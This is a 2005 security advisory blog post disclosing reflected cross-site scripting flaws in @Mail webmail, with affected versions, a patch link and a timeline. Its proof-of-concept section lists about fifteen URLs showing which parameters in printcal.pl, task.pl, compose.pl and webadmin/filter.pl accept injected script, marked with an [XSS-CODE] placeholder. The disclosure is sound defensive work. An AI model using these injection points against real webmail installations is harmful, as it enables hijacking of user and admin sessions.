@Mail multiple variable cross-site scripting

Thursday, July 28, 2005
#############################################
@Mail multiple variable cross-site scripting
vendor url:http://www.atmail.com
Advisory:http://lostmon.blogspot.com/2005/07/
mail-multiple-variable-cross-site.html
vendor notify:yes exploit available: yes
OSVDB ID:18337,18338,18339,18340
Secunia: SA16252
BID: 14408
##############################################


@Mail is a feature rich Email solution that allows users to access
email-resources via the web or a variety of wireless devices. The
software incorporates a complete email-server package to manage
and host user email at your domain(s)


@Mail contains a flaw that allows a remote cross site scripting
attack.This flaw exists because the application does not validate
multiple variables upon submission to multiple scripts.This could
allow a user to create a specially crafted URL that would execute
arbitrary code in a user's browser within the trust relationship
between the browser and the server, leading to a loss of integrity.

#############
versions
#############

@Mail 4.03 WebMail for Windows
@Mail 4.11 - Linux / FreeBSD / Solaris / HP-UX / OS-X /

it is also posible other versions are vulnerable.

#################
solution
#################

Apply patch for version 4.11.
http://calacode.com/patch.pl

#################
Timeline
#################

Discovered:02-07-2005
vendor notify:27-07-2005
vendor response:28-07-2005
disclosure:28-07-2005


##################
Proof of comcepts
##################

For exploit this flaws, need a client login and for exploiting
all flaws in /webadmin/ need a admin login.

###################
princal.pl
###################

http://[victim]/printcal.pl?year=[XSS-CODE]&month=11&type=4

http://[victim]/printcal.pl?year=&month=11&type=4[XSS-CODE]

http://[victim]/printcal.pl?type=4[XSS-CODE]

###################
task.pl
###################

http://[victim]/task.pl?func=todo[XSS-CODE]

###################
compose.pl
####################

http://[victim]/compose.pl?id=cur/1117452847.H104572P10795.
[victim].com%3A2%2C&folder=Sent&cache=&func=reply
&type=reply[XSS-CODE]

http://[victim]/compose.pl?spellcheck=112253846919856.sc.new
&func=spellcheck&HtmlEditor=1&unique=19944&msgtype=r[XSS-CODE]

http://[victim]/compose.pl?spellcheck=112253846919856.sc.new
&func=spellcheck&HtmlEditor=1&unique=19944[XSS-CODE]&msgtype=r

http://[victim]/compose.pl?func=new&To=
lala@lala.es&Cc=&Bcc=[XSS-CODE]


http://[victim]/compose.pl?func=new&To=
lala@lala.es&Cc=[XSS-CODE]&Bcc=

http://[victim]/compose.pl?func=new&To=
lala@lala.es[XSS-CODE]&Cc=&Bcc=

###################
webadmin/filter.pl
###################

http://[victim]/webadmin/filter.pl?func=
viewmailrelay&Order=IPaddress[XSS-CODE]

http://[victim]/webadmin/filter.pl?func=filter
&Header=blacklist_from&Type=1[XSS-CODE]&View=1

http://[victim]/webadmin/filter.pl?func=filter
&Header=blacklist_from[XSS-CODE]&Type=1&View=1

http://[victim]/webadmin/filter.pl?
func=filter&Header=whitelist_from&Type=0&Display=1
&Sort=value[XSS-CODE]&Type=1&View=1



######################## €nd ##########################

Thnx to estrella to be my ligth

atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
La curiosidad es lo que hace mover la mente....
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...